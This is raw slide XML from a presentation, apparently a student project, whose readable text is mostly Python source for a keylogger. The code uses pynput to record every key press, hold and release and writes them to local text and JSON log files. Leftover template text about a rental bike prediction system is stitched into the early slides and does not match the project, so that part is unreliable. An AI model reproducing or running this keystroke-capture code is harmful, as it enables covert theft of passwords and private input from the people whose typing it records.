          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048609" name="Google Shape;121;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="662572"/>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0" name="Google Shape;122;p17"/>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656"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The "System Approach" section outlines the overall strategy and methodology for developing and implementing the rental bike prediction system. Here's a suggested structure for this section:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1656"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100 MB free disk space, Pentium II processor, 512 MB RAM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1656"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.ywin32 ,p.yhook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26"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048613" name="Google Shape;127;p18"/>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14" name="Google Shape;128;p18"/>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1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en-IN"/>
              <a:t>In the Algorithm section, describe the machine learning algorithm chosen for predicting bike counts. Here's an example structure for this section:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en-IN"/>
              <a:t>Algorithm Selection:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="1" marL="629920" rtl="0">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p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en-IN"/>
              <a:t>Data Input:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="1" marL="629920" rtl="0">
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>Specify the input features used by the algorithm, such as historical bike rental data, weather conditions, day of the week, and any other relevant factors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en-IN"/>
              <a:t>Training Process:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="1" marL="629920" rtl="0">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p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1400" lang="en-IN"/>
              <a:t>Prediction Process:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-305435" lvl="1" marL="629920" rtl="0">
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>Detail how the trained algorithm makes predictions for future bike counts. Discuss any real-time data inputs considered during the prediction phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="-206121" lvl="0" marL="305435" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <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Shape 132"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048617" name="Google Shape;133;p19"/>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18" name="Google Shape;134;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686025" y="1118250"/>
            <a:ext cx="11029500" cy="3937500"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="45700" lIns="91425" rIns="91425" spcFirstLastPara="1" tIns="45700" wrap="square">
            <a:normAutofit fontScale="29412" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>import json</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keys_used = []</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>keys = ""</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def generate_text_log(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        keys.write(key)</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def generate_json_file(keys_used):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        key_log.write(key_list_bytes)</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def on_press(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        flag = True</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    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</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def on_release(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    )</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    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</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    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="92000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048619" name="Google Shape;135;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1231075" y="1458675"/>
            <a:ext cx="10877700" cy="386050"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="91425" lIns="91425" rIns="91425" spcFirstLastPara="1" tIns="91425" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>i</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Shape 139"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048622" name="Google Shape;140;p2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23" name="Google Shape;141;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581250" y="1232550"/>
            <a:ext cx="11029500" cy="3937500"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="45700" lIns="91425" rIns="91425" spcFirstLastPara="1" tIns="45700" wrap="square">
            <a:normAutofit fontScale="47059" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-IN"/>
              <a:t>    listener.start()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
